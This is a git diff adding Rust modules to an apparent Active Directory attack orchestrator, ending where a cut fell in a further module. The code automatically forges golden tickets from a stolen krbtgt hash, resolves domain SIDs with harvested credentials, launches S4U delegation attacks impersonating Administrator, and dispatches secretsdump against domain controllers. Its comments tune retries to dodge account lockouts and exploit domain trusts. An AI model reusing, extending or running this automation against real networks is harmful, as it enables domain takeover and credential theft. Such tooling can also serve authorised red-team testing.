a/ares-cli/src/orchestrator/automation/golden_ticket.rs b/ares-cli/src/orchestrator/automation/golden_ticket.rs new file mode 100644 index 00000000..d58b7372 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/golden_ticket.rs @@ -0,0 +1,295 @@ +//! auto_golden_ticket -- monitor for krbtgt hash and forge golden ticket. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; + +/// Monitors for krbtgt hash and triggers golden ticket forging. +/// Interval: 30s. Matches Python `_auto_golden_ticket`. +pub async fn auto_golden_ticket(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! 
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + let state = dispatcher.state.read().await; + + // Skip if already have golden ticket + if state.has_golden_ticket { + continue; + } + + // Skip if no domain admin yet + if !state.has_domain_admin { + continue; + } + + // Look for krbtgt hash + let krbtgt_hash = state + .hashes + .iter() + .find(|h| h.username.to_lowercase() == "krbtgt"); + + let krbtgt = match krbtgt_hash { + Some(h) => h.clone(), + None => continue, + }; + + let domain = if !krbtgt.domain.is_empty() { + krbtgt.domain.clone() + } else { + match state.domains.first() { + Some(d) => d.clone(), + None => continue, + } + }; + + // Domain SID: prefer cached value, resolve via lookupsid if missing. + let mut domain_sid = state.domain_sids.get(&domain.to_lowercase()).cloned(); + + // Look up a DC IP for this domain + let dc_ip = state + .domain_controllers + .get(&domain.to_lowercase()) + .cloned(); + + // Find the best credential for the domain: prefer plaintext, fall back to NTLM hash. + let admin_cred = state + .credentials + .iter() + .find(|c| { + c.username.to_lowercase() == "administrator" + && c.domain.to_lowercase() == domain.to_lowercase() + }) + .cloned(); + let admin_hash = state + .hashes + .iter() + .find(|h| { + h.username.to_lowercase() == "administrator" + && h.domain.to_lowercase() == domain.to_lowercase() + && h.hash_type.to_uppercase() == "NTLM" + }) + .cloned(); + + // Collect a password credential for SID lookup (any domain user will do). + // Prefer a cred from the target domain, but fall back to any valid cred + // since NTLM cross-domain auth works for lookupsid via trust relationships. + let lookup_cred = state + .credentials + .iter() + .find(|c| { + c.domain.to_lowercase() == domain.to_lowercase() + && !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| { + state.credentials.iter().find(|c| { + !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + }) + .cloned(); + + drop(state); + + // ── Resolve domain SID if not cached ──────────────────────────── + if domain_sid.is_none() { + if let Some(ref target_ip) = dc_ip { + let result = resolve_domain_sid( + &domain, + target_ip, + lookup_cred.as_ref(), + admin_hash.as_ref(), + ) + .await; + + // Cache the resolved SID and admin name + if let Some((ref sid, ref admin_name)) = result { + info!(domain = %domain, sid = %sid, admin = admin_name.as_deref().unwrap_or("Administrator"), "Domain SID resolved via lookupsid"); + let op_id = { dispatcher.state.read().await.operation_id.clone() }; + let reader = ares_core::state::RedisStateReader::new(op_id); + let mut conn = dispatcher.queue.connection(); + if let Err(e) = reader + .set_domain_sid(&mut conn, &domain.to_lowercase(), sid) + .await + { + warn!(err = %e, "Failed to persist domain SID to Redis"); + } + if let Some(ref name) = admin_name { + if let Err(e) = reader + .set_admin_name(&mut conn, &domain.to_lowercase(), name) + .await + { + warn!(err = %e, "Failed to persist admin name to Redis"); + } + } + let mut state = dispatcher.state.write().await; + state.domain_sids.insert(domain.to_lowercase(), sid.clone()); + if let Some(ref name) = admin_name { + state + .admin_names + .insert(domain.to_lowercase(), name.clone()); + } + } + + domain_sid = result.map(|(sid, _)| sid); + } + } + + let domain_sid = match domain_sid { + Some(sid) => sid, + None => { + warn!(domain = %domain, "Cannot resolve domain SID — 
skipping golden ticket");
+                continue;
+            }
+        };
+
+        // Use cached RID-500 name, defaulting to "Administrator" when unknown.
+        let admin_username = {
+            let state = dispatcher.state.read().await;
+            state
+                .admin_names
+                .get(&domain.to_lowercase())
+                .cloned()
+                .unwrap_or_else(|| "Administrator".to_string())
+        };
+
+        // ── Build and submit golden ticket task ─────────────────────────
+        // Strip LM prefix if hash is in "lm:ntlm" format — ticketer expects
+        // a single 32-char NTLM hex string, not the LM:NTLM pair.
+        let ntlm_hash = match krbtgt.hash_value.rsplit_once(':') {
+            Some((_, ntlm)) if ntlm.len() == 32 => ntlm.to_string(),
+            _ => krbtgt.hash_value.clone(),
+        };
+
+        let mut payload = json!({
+            "technique": "golden_ticket",
+            "vuln_type": "golden_ticket",
+            "domain": domain,
+            "krbtgt_hash": ntlm_hash,
+            "username": admin_username,
+            "domain_sid": domain_sid,
+        });
+        if let Some(ip) = dc_ip {
+            payload["dc_ip"] = json!(ip);
+        }
+        if let Some(ref cred) = admin_cred {
+            payload["admin_password"] = json!(cred.password);
+            payload["admin_domain"] = json!(cred.domain);
+        }
+        if let Some(ref hash) = admin_hash {
+            payload["admin_hash"] = json!(hash.hash_value);
+            payload["admin_domain"] =
+                json!(admin_cred.as_ref().map_or(&hash.domain, |c| &c.domain));
+        }
+        if let Some(ref aes) = krbtgt.aes_key {
+            payload["aes_key"] = json!(aes);
+        }
+
+        match dispatcher
+            .throttled_submit("exploit", "privesc", payload, 1)
+            .await
+        {
+            Ok(Some(task_id)) => {
+                info!(task_id = %task_id, domain = %domain, "Golden ticket task dispatched");
+                // Mark has_golden_ticket immediately to prevent re-dispatch.
+                // The result processing will also confirm on task completion
+                // (detects "Saving ticket in *.ccache" in tool output).
+                if let Err(e) = dispatcher
+                    .state
+                    .set_golden_ticket(&dispatcher.queue, &domain)
+                    .await
+                {
+                    warn!(err = %e, "Failed to set golden ticket flag after dispatch");
+                }
+            }
+            Ok(None) => {}
+            Err(e) => warn!(err = %e, "Failed to dispatch golden ticket"),
+        }
+    }
+}
+
+/// Resolve domain SID and RID-500 account name by calling `impacket-lookupsid`.
+/// Returns `(domain_sid, Option<String>)`. Tries password credential first,
+/// then NTLM hash.
+///
+/// Uses the credential's own domain for NTLM auth (not the target domain) so
+/// cross-domain trust authentication works — e.g. a `child.contoso.local`
+/// cred can resolve the SID of `contoso.local` via its parent DC.
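+///
+/// The SID/name extraction helpers expect lookupsid-style banner lines; an
+/// illustrative (assumed, not captured) output shape:
+///
+/// ```text
+/// [*] Domain SID is: S-1-5-21-1004336348-1177238915-682003330
+/// 500: CONTOSO\Administrator (SidTypeUser)
+/// ```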
+async fn resolve_domain_sid(
+    domain: &str,
+    dc_ip: &str,
+    password_cred: Option<&ares_core::models::Credential>,
+    admin_hash: Option<&ares_core::models::Hash>,
+) -> Option<(String, Option<String>)> {
+    // Try password auth first — use the credential's native domain for auth
+    if let Some(cred) = password_cred {
+        let auth_domain = if cred.domain.is_empty() {
+            domain
+        } else {
+            &cred.domain
+        };
+        let args = json!({
+            "domain": auth_domain,
+            "username": cred.username,
+            "password": cred.password,
+            "dc_ip": dc_ip,
+        });
+        match ares_tools::privesc::get_sid(&args).await {
+            Ok(output) => {
+                let text = output.combined_raw();
+                if let Some(sid) = ares_core::parsing::extract_domain_sid(&text) {
+                    let admin_name = ares_core::parsing::extract_rid500_name(&text);
+                    return Some((sid, admin_name));
+                }
+                warn!(auth_domain = %auth_domain, user = %cred.username, "lookupsid succeeded but no SID pattern found in output");
+            }
+            Err(e) => {
+                warn!(err = %e, user = %cred.username, auth_domain = %auth_domain, "lookupsid with password failed");
+            }
+        }
+    }
+
+    // Fall back to hash auth — use the hash's native domain for auth
+    if let Some(hash) = admin_hash {
+        let auth_domain = if hash.domain.is_empty() {
+            domain
+        } else {
+            &hash.domain
+        };
+        let args = json!({
+            "domain": auth_domain,
+            "username": "Administrator",
+            "hash": hash.hash_value,
+            "dc_ip": dc_ip,
+        });
+        match ares_tools::privesc::get_sid(&args).await {
+            Ok(output) => {
+                let text = output.combined_raw();
+                if let Some(sid) = ares_core::parsing::extract_domain_sid(&text) {
+                    let admin_name = ares_core::parsing::extract_rid500_name(&text);
+                    return Some((sid, admin_name));
+                }
+                warn!(auth_domain = %auth_domain, "lookupsid (hash) succeeded but no SID pattern found");
+            }
+            Err(e) => {
+                warn!(err = %e, auth_domain = %auth_domain, "lookupsid with admin hash failed");
+            }
+        }
+    }
+
+    None
+}
diff --git a/ares-cli/src/orchestrator/automation/mod.rs b/ares-cli/src/orchestrator/automation/mod.rs
new file mode 100644
index 00000000..3768130b
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/mod.rs
@@ -0,0 +1,64 @@
+//! Background automation tasks.
+//!
+//! Each `auto_*` function is a long-running tokio task that periodically checks
+//! the shared state and dispatches new tasks when conditions are met. All follow
+//! the same pattern:
+//!
+//! 1. Sleep for an interval (configurable)
+//! 2. Take a read lock, collect new work items
+//! 3. Release lock, submit tasks via the dispatcher
+//! 4. Mark items as processed (write lock + Redis persist)
+//!
+//! This mirrors the Python `_orchestrator.py` background tasks but eliminates
+//! all threading hacks since tokio tasks are truly concurrent.
+
+mod acl;
+mod adcs;
+mod bloodhound;
+mod coercion;
+mod crack;
+mod credential_access;
+mod credential_expansion;
+mod delegation;
+mod gmsa;
+mod golden_ticket;
+mod mssql;
+mod refresh;
+mod s4u;
+mod secretsdump;
+mod share_enum;
+mod shares;
+mod stall_detection;
+mod trust;
+mod unconstrained;
+
+// Re-export all public task functions at the same paths they had before the split.
+pub use acl::auto_acl_chain_follow; +pub use adcs::auto_adcs_enumeration; +pub use bloodhound::auto_bloodhound; +pub use coercion::auto_coercion; +pub use crack::auto_crack_dispatch; +pub use credential_access::auto_credential_access; +pub use credential_expansion::auto_credential_expansion; +pub use delegation::auto_delegation_enumeration; +pub use gmsa::auto_gmsa_extraction; +pub use golden_ticket::auto_golden_ticket; +pub use mssql::auto_mssql_detection; +pub use refresh::state_refresh; +pub use s4u::auto_s4u_exploitation; +pub use secretsdump::auto_local_admin_secretsdump; +pub use share_enum::auto_share_enumeration; +pub use shares::auto_share_spider; +pub use stall_detection::auto_stall_detection; +pub use trust::auto_trust_follow; +pub use unconstrained::auto_unconstrained_exploitation; + +pub(crate) fn crack_dedup_key(hash: &ares_core::models::Hash) -> String { + let prefix = &hash.hash_value[..32.min(hash.hash_value.len())]; + format!( + "{}:{}:{}", + hash.domain.to_lowercase(), + hash.username.to_lowercase(), + prefix + ) +} diff --git a/ares-cli/src/orchestrator/automation/mssql.rs b/ares-cli/src/orchestrator/automation/mssql.rs new file mode 100644 index 00000000..9f6fd8d2 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/mssql.rs @@ -0,0 +1,94 @@ +//! auto_mssql_detection -- detect MSSQL services on hosts. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; + +/// Scans hosts for MSSQL services (port 1433) and queues exploitation vulns. +/// Interval: 30s. Matches Python `_auto_mssql_detection`. +pub async fn auto_mssql_detection( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! 
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + let work: Vec<(String, String)> = { + let state = dispatcher.state.read().await; + state + .hosts + .iter() + .filter(|h| { + h.services + .iter() + .any(|s| s.contains("1433") || s.to_lowercase().contains("mssql")) + }) + .filter(|h| !state.mssql_enum_dispatched.contains(&h.ip)) + .map(|h| (h.ip.clone(), h.hostname.clone())) + .collect() + }; + + for (ip, hostname) in work { + let vuln = ares_core::models::VulnerabilityInfo { + vuln_id: format!("mssql_{}", ip.replace('.', "_")), + vuln_type: "mssql_access".to_string(), + target: ip.clone(), + discovered_by: "auto_mssql_detection".to_string(), + discovered_at: chrono::Utc::now(), + details: { + let mut d = std::collections::HashMap::new(); + d.insert("target_ip".to_string(), json!(ip)); + if !hostname.is_empty() { + d.insert("hostname".to_string(), json!(hostname)); + // Extract domain from FQDN: "sql01.fabrikam.local" → "fabrikam.local" + if let Some(dot_pos) = hostname.find('.') { + let domain = &hostname[dot_pos + 1..]; + if !domain.is_empty() { + d.insert("domain".to_string(), json!(domain)); + } + } + } + d + }, + recommended_agent: "lateral".to_string(), + priority: 4, + }; + + match dispatcher + .state + .publish_vulnerability(&dispatcher.queue, vuln) + .await + { + Ok(true) => { + info!(ip = %ip, "MSSQL service detected — vulnerability queued"); + dispatcher + .state + .write() + .await + .mssql_enum_dispatched + .insert(ip.clone()); + let _ = dispatcher + .state + .persist_mssql_dispatched(&dispatcher.queue, &ip) + .await; + } + Ok(false) => {} // already exists + Err(e) => warn!(err = %e, "Failed to publish MSSQL vulnerability"), + } + } + } +} diff --git a/ares-cli/src/orchestrator/automation/refresh.rs b/ares-cli/src/orchestrator/automation/refresh.rs new file mode 100644 index 00000000..27dceefb --- /dev/null +++ b/ares-cli/src/orchestrator/automation/refresh.rs @@ -0,0 +1,32 @@ +//! state_refresh -- periodic refresh of state from Redis. + +use std::sync::Arc; +use std::time::Duration; + +use tokio::sync::watch; +use tracing::warn; + +use crate::orchestrator::dispatcher::Dispatcher; + +/// Periodically refreshes state from Redis to pick up worker-published discoveries. +/// Interval: 10s. +pub async fn state_refresh(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(10)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + // Skip first tick + interval.tick().await; + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if let Err(e) = dispatcher.state.refresh_from_redis(&dispatcher.queue).await { + warn!(err = %e, "State refresh failed"); + } + } +} diff --git a/ares-cli/src/orchestrator/automation/s4u.rs b/ares-cli/src/orchestrator/automation/s4u.rs new file mode 100644 index 00000000..0f4f269c --- /dev/null +++ b/ares-cli/src/orchestrator/automation/s4u.rs @@ -0,0 +1,354 @@ +//! auto_s4u_exploitation -- exploit delegation vulnerabilities via S4U. +//! +//! When constrained or RBCD delegation vulnerabilities are discovered (via +//! `find_delegation` or BloodHound), this automation dispatches S4U attacks +//! using available credentials for the delegating account. +//! +//! NOTE: Unconstrained delegation is handled by `auto_unconstrained_exploitation` +//! which orchestrates the coerce → dump → secretsdump chain. 
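+//!
+//! Retry policy (see the constants below): a failed dispatch is retried only
+//! after `S4U_FAILURE_COOLDOWN` elapses; `S4U_MAX_FAILURES` consecutive
+//! failures, or a permanent revocation error in a task result, stop retries
+//! for that vuln entirely, while a successful result resets the counter.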
+ +use std::collections::HashMap; +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tokio::time::Instant; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; + +/// Cooldown after a failed S4U attempt before retrying the same vuln. +/// Set to 5 minutes to wait for AD account lockout to expire. +const S4U_FAILURE_COOLDOWN: Duration = Duration::from_secs(300); + +/// Maximum consecutive failures before giving up on a vuln. +/// Set higher than the expected number of spray-induced lockouts +/// so that S4U can eventually succeed once sprays stop re-locking. +const S4U_MAX_FAILURES: u32 = 6; + +/// Kerberos/SMB errors that indicate an account is permanently disabled/revoked. +/// These should permanently block the vuln — no point retrying. +const PERMANENT_REVOCATION_PATTERNS: &[&str] = &["STATUS_ACCOUNT_DISABLED", "KDC_ERR_KEY_EXPIRED"]; + +/// Kerberos/SMB errors that indicate a temporary lockout. +/// These should count as failures but NOT permanently block — the lockout expires. +const LOCKOUT_PATTERNS: &[&str] = &["KDC_ERR_CLIENT_REVOKED", "STATUS_ACCOUNT_LOCKED_OUT"]; + +/// Monitors for delegation vulnerabilities and dispatches S4U attacks. +/// Interval: 20s. +pub async fn auto_s4u_exploitation( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let deleg_notify = dispatcher.delegation_notify.clone(); + let cred_notify = dispatcher.credential_access_notify.clone(); + let mut interval = tokio::time::interval(Duration::from_secs(20)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + // Track dispatch attempts per vuln to prevent infinite retry loops. + // Maps vuln_id -> (last_dispatch_time, failure_count) + let mut dispatch_tracker: HashMap = HashMap::new(); + + // Track task_id -> vuln_id so we can check completed task results for + // revocation errors and immediately stop retrying those vulns. + let mut task_vuln_map: HashMap = HashMap::new(); + + loop { + // Wake on: timer tick, new delegation vuln, OR new credential (so S4U fires + // immediately when a constrained delegation account's password is cracked). + tokio::select! { + _ = interval.tick() => {}, + _ = deleg_notify.notified() => {}, + _ = cred_notify.notified() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + // Check completed tasks for revocation/lockout errors. + // - Permanent revocation (disabled account) → block forever. + // - Temporary lockout → just count the failure, let cooldown handle retry. + { + let state = dispatcher.state.read().await; + let finished: Vec = task_vuln_map + .keys() + .filter(|tid| state.completed_tasks.contains_key(tid.as_str())) + .cloned() + .collect(); + for tid in finished { + if let Some(result) = state.completed_tasks.get(&tid) { + if has_permanent_revocation(result) { + if let Some(vid) = task_vuln_map.remove(&tid) { + warn!( + task_id = %tid, + vuln_id = %vid, + "S4U blocked: account permanently disabled — no further retries" + ); + dispatch_tracker.entry(vid).or_insert((Instant::now(), 0)).1 = + S4U_MAX_FAILURES; + } + } else if has_lockout_error(result) { + if let Some(vid) = task_vuln_map.remove(&tid) { + debug!( + task_id = %tid, + vuln_id = %vid, + "S4U lockout detected — will retry after cooldown" + ); + // Don't increment failure count beyond what dispatch already counted. + // The cooldown timer is already set from dispatch time. 
+ } + } else { + // Success or non-revocation error — reset failure count so + // subsequent dispatches aren't permanently blocked by the + // S4U_MAX_FAILURES threshold. + if let Some(vid) = task_vuln_map.remove(&tid) { + if let Some(entry) = dispatch_tracker.get_mut(&vid) { + entry.1 = 0; + } + } + } + } + } + } + + let work: Vec = { + let state = dispatcher.state.read().await; + + // Skip if already domain admin + if state.has_domain_admin { + continue; + } + + state + .discovered_vulnerabilities + .values() + .filter_map(|vuln| { + let vtype = vuln.vuln_type.to_lowercase(); + if vtype != "constrained_delegation" && vtype != "rbcd" { + return None; + } + + // Already exploited? + if state.exploited_vulnerabilities.contains(&vuln.vuln_id) { + return None; + } + + // Check dispatch cooldown — skip if recently dispatched and failed + if let Some((last_time, failures)) = dispatch_tracker.get(&vuln.vuln_id) { + if *failures >= S4U_MAX_FAILURES { + debug!( + vuln_id = %vuln.vuln_id, + failures = *failures, + "S4U skipped: max failures reached" + ); + return None; + } + if last_time.elapsed() < S4U_FAILURE_COOLDOWN { + return None; // Still in cooldown + } + } + + // Extract the delegating account name from details + let account_name = vuln + .details + .get("account_name") + .and_then(|v| v.as_str()) + .or_else(|| vuln.details.get("AccountName").and_then(|v| v.as_str())) + .map(|s| s.to_string()); + + let target_spn = vuln + .details + .get("delegation_target") + .and_then(|v| v.as_str()) + .or_else(|| { + vuln.details + .get("AllowedToDelegate") + .and_then(|v| v.as_str()) + }) + .map(|s| s.to_string()); + + // Find a credential or hash for the delegating account + let credential = account_name.as_ref().and_then(|acct| { + state + .credentials + .iter() + .find(|c| c.username.to_lowercase() == acct.to_lowercase()) + .cloned() + }); + + let hash = account_name.as_ref().and_then(|acct| { + state + .hashes + .iter() + .find(|h| { + h.username.to_lowercase() == acct.to_lowercase() + && h.hash_type.to_uppercase() == "NTLM" + }) + .cloned() + }); + + // Need at least a credential or hash to perform S4U + if credential.is_none() && hash.is_none() { + debug!( + vuln_id = %vuln.vuln_id, + vuln_type = %vuln.vuln_type, + account = ?account_name, + "S4U skipped: no credential or hash for delegating account" + ); + return None; + } + + // Resolve domain and DC IP + let domain = credential + .as_ref() + .map(|c| c.domain.clone()) + .or_else(|| hash.as_ref().map(|h| h.domain.clone())) + .unwrap_or_default(); + + let dc_ip = state + .domain_controllers + .get(&domain.to_lowercase()) + .cloned(); + + Some(S4uWork { + vuln: vuln.clone(), + credential, + hash, + target_spn, + domain, + dc_ip, + }) + }) + .collect() + }; + + for item in work { + let mut payload = json!({ + "technique": "s4u_attack", + "vuln_type": item.vuln.vuln_type, + "target": item.vuln.target, + "domain": item.domain, + "impersonate": "Administrator", + }); + + if let Some(ref spn) = item.target_spn { + payload["target_spn"] = json!(spn); + } + if let Some(ref dc) = item.dc_ip { + payload["target_ip"] = json!(dc); + } + + // Attach credential or hash — provide both flat fields (for prompt + // builders) and nested credential object (for structured extraction). 
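+        // Illustrative final payload for the credential branch (values
+        // hypothetical; target_spn/target_ip are optional, and vuln_id is
+        // attached just below):
+        //
+        //   { "technique": "s4u_attack", "vuln_type": "constrained_delegation",
+        //     "target": "...", "domain": "child.contoso.local",
+        //     "impersonate": "Administrator", "username": "svc_sql",
+        //     "password": "...", "account_name": "svc_sql",
+        //     "credential": { "username": "svc_sql", "password": "...",
+        //                     "domain": "child.contoso.local" } }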
+ if let Some(ref cred) = item.credential { + payload["username"] = json!(cred.username); + payload["password"] = json!(cred.password); + payload["account_name"] = json!(cred.username); + payload["credential"] = json!({ + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }); + } else if let Some(ref hash) = item.hash { + payload["hash"] = json!(hash.hash_value); + payload["username"] = json!(hash.username); + if let Some(ref aes) = hash.aes_key { + payload["aes_key"] = json!(aes); + } + } + + let vuln_id = item.vuln.vuln_id.clone(); + // Attach vuln_id so result processing can mark_exploited on success + payload["vuln_id"] = json!(&vuln_id); + + // Priority 10 = highest — S4U must run before other agents use the + // credential and potentially lock out the account. + match dispatcher + .throttled_submit("exploit", "privesc", payload, 10) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + vuln_id = %vuln_id, + vuln_type = %item.vuln.vuln_type, + "S4U exploitation dispatched" + ); + // Record dispatch — increment failure count (reset on next success). + // The cooldown prevents rapid re-dispatch if it fails. + let entry = dispatch_tracker + .entry(vuln_id.clone()) + .or_insert((Instant::now(), 0)); + entry.0 = Instant::now(); + entry.1 += 1; + // Track task → vuln so we can check for revocation on completion. + task_vuln_map.insert(task_id, vuln_id); + } + Ok(None) => { + debug!(vuln_id = %vuln_id, "S4U task deferred by throttler"); + } + Err(e) => { + warn!(err = %e, vuln_id = %vuln_id, "Failed to dispatch S4U exploit") + } + } + } + } +} + +struct S4uWork { + vuln: ares_core::models::VulnerabilityInfo, + credential: Option, + hash: Option, + target_spn: Option, + domain: String, + dc_ip: Option, +} + +/// Check whether a task result matches any of the given error patterns. +fn result_matches_patterns(result: &ares_core::models::TaskResult, patterns: &[&str]) -> bool { + let payload = match &result.result { + Some(v) => v, + None => return false, + }; + + // Check error field + if let Some(err) = &result.error { + if patterns.iter().any(|p| err.contains(p)) { + return true; + } + } + + // Check raw tool outputs (array of strings embedded in the result payload) + if let Some(outputs) = payload.get("tool_outputs").and_then(|v| v.as_array()) { + for output in outputs { + if let Some(text) = output.as_str() { + if patterns.iter().any(|p| text.contains(p)) { + return true; + } + } + } + } + + // Check summary/result text + for key in &["summary", "output", "tool_output"] { + if let Some(text) = payload.get(*key).and_then(|v| v.as_str()) { + if patterns.iter().any(|p| text.contains(p)) { + return true; + } + } + } + + false +} + +/// Account is permanently disabled — no point retrying. +fn has_permanent_revocation(result: &ares_core::models::TaskResult) -> bool { + result_matches_patterns(result, PERMANENT_REVOCATION_PATTERNS) +} + +/// Account is temporarily locked out — will unlock after AD lockout duration. +fn has_lockout_error(result: &ares_core::models::TaskResult) -> bool { + result_matches_patterns(result, LOCKOUT_PATTERNS) +} diff --git a/ares-cli/src/orchestrator/automation/secretsdump.rs b/ares-cli/src/orchestrator/automation/secretsdump.rs new file mode 100644 index 00000000..c8f62138 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/secretsdump.rs @@ -0,0 +1,98 @@ +//! auto_local_admin_secretsdump -- secretsdump with admin creds. 
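+//!
+//! Despite the name, dispatch is not gated on a confirmed `is_admin` flag:
+//! any plaintext credential is tried against DCs in its own (or parent/child)
+//! domain, since secretsdump fails fast without privileges. Confirmed-admin
+//! creds are submitted at priority 2, everything else at priority 5.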
+ +use std::sync::Arc; +use std::time::Duration; + +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Dispatches secretsdump when admin credentials are detected. +/// Interval: 30s. Matches Python `_auto_local_admin_secretsdump`. +pub async fn auto_local_admin_secretsdump( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + // Collect credentials with passwords + target DCs. + // Do NOT gate on is_admin — the credential may have admin rights we + // haven't confirmed yet. Secretsdump will fail fast if it lacks + // privileges, but when it succeeds it's the fastest path to krbtgt. + // IMPORTANT: only target DCs in the credential's domain (or child + // domains). Cross-domain secretsdump attempts generate failed auths + // that trigger AD account lockout. + let work: Vec<(String, String, ares_core::models::Credential)> = { + let state = dispatcher.state.read().await; + let creds: Vec<_> = state + .credentials + .iter() + .filter(|c| !c.domain.is_empty() && !c.password.is_empty()) + // Skip delegation accounts — secretsdump will always fail + // (non-admin) and wastes auth budget reserved for S4U. + .filter(|c| c.is_admin || !state.is_delegation_account(&c.username)) + .filter(|c| !state.is_credential_quarantined(&c.username, &c.domain)) + .cloned() + .collect(); + + let mut items = Vec::new(); + for cred in &creds { + let cred_domain = cred.domain.to_lowercase(); + for (dc_domain, dc_ip) in state.domain_controllers.iter() { + let d = dc_domain.to_lowercase(); + // Same domain, child domain, or parent domain + if d == cred_domain + || d.ends_with(&format!(".{cred_domain}")) + || cred_domain.ends_with(&format!(".{d}")) + { + let dedup = format!( + "{}:{}:{}", + dc_ip, + cred.domain.to_lowercase(), + cred.username.to_lowercase() + ); + if !state.is_processed(DEDUP_SECRETSDUMP, &dedup) { + items.push((dedup, dc_ip.clone(), cred.clone())); + } + } + } + } + items + }; + + for (dedup_key, dc_ip, cred) in work.into_iter().take(3) { + let priority = if cred.is_admin { 2 } else { 5 }; + match dispatcher + .request_secretsdump(&dc_ip, &cred, priority) + .await + { + Ok(Some(task_id)) => { + info!(task_id = %task_id, dc = %dc_ip, user = %cred.username, "Admin secretsdump dispatched"); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SECRETSDUMP, dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SECRETSDUMP, &dedup_key) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch secretsdump"), + } + } + } +} diff --git a/ares-cli/src/orchestrator/automation/share_enum.rs b/ares-cli/src/orchestrator/automation/share_enum.rs new file mode 100644 index 00000000..749c3851 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/share_enum.rs @@ -0,0 +1,106 @@ +//! auto_share_enumeration -- enumerate SMB shares on discovered hosts using credentials. + +use std::sync::Arc; +use std::time::Duration; + +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Dispatches share enumeration on each known host when credentials are available. +/// Interval: 20s. 
Dedup key: "{host_ip}:{cred_user}:{cred_domain}". +pub async fn auto_share_enumeration( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(20)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + let mut no_cred_logged = false; + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + let work: Vec<(String, String, ares_core::models::Credential)> = { + let state = dispatcher.state.read().await; + // Use first non-delegation credential to avoid burning auth budget + // on accounts reserved for S4U exploitation. + let cred = match state + .credentials + .iter() + .find(|c| { + !state.is_delegation_account(&c.username) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| state.credentials.first()) + { + Some(c) => { + no_cred_logged = false; + c.clone() + } + None => { + if !no_cred_logged { + info!( + hosts = state.hosts.len(), + target_ips = state.target_ips.len(), + "Share enum: no credentials in memory yet, waiting" + ); + no_cred_logged = true; + } + continue; + } + }; + + // Enumerate shares on every known host (target IPs + discovered hosts) + let mut ips: Vec = state.target_ips.clone(); + for host in &state.hosts { + if !ips.contains(&host.ip) { + ips.push(host.ip.clone()); + } + } + + ips.into_iter() + .filter_map(|ip| { + let dedup = format!( + "{}:{}:{}", + ip, + cred.username.to_lowercase(), + cred.domain.to_lowercase() + ); + if state.is_processed(DEDUP_SHARE_ENUM, &dedup) { + None + } else { + Some((dedup, ip, cred.clone())) + } + }) + .take(5) + .collect() + }; + + for (dedup_key, host_ip, cred) in work { + match dispatcher.request_share_enumeration(&host_ip, &cred).await { + Ok(Some(task_id)) => { + info!(task_id = %task_id, host = %host_ip, "Share enumeration dispatched"); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SHARE_ENUM, dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SHARE_ENUM, &dedup_key) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch share enumeration"), + } + } + } +} diff --git a/ares-cli/src/orchestrator/automation/shares.rs b/ares-cli/src/orchestrator/automation/shares.rs new file mode 100644 index 00000000..ccc50320 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/shares.rs @@ -0,0 +1,82 @@ +//! auto_share_spider -- spider readable shares for credentials. + +use std::sync::Arc; +use std::time::Duration; + +use tokio::sync::watch; +use tracing::{debug, warn}; + +use 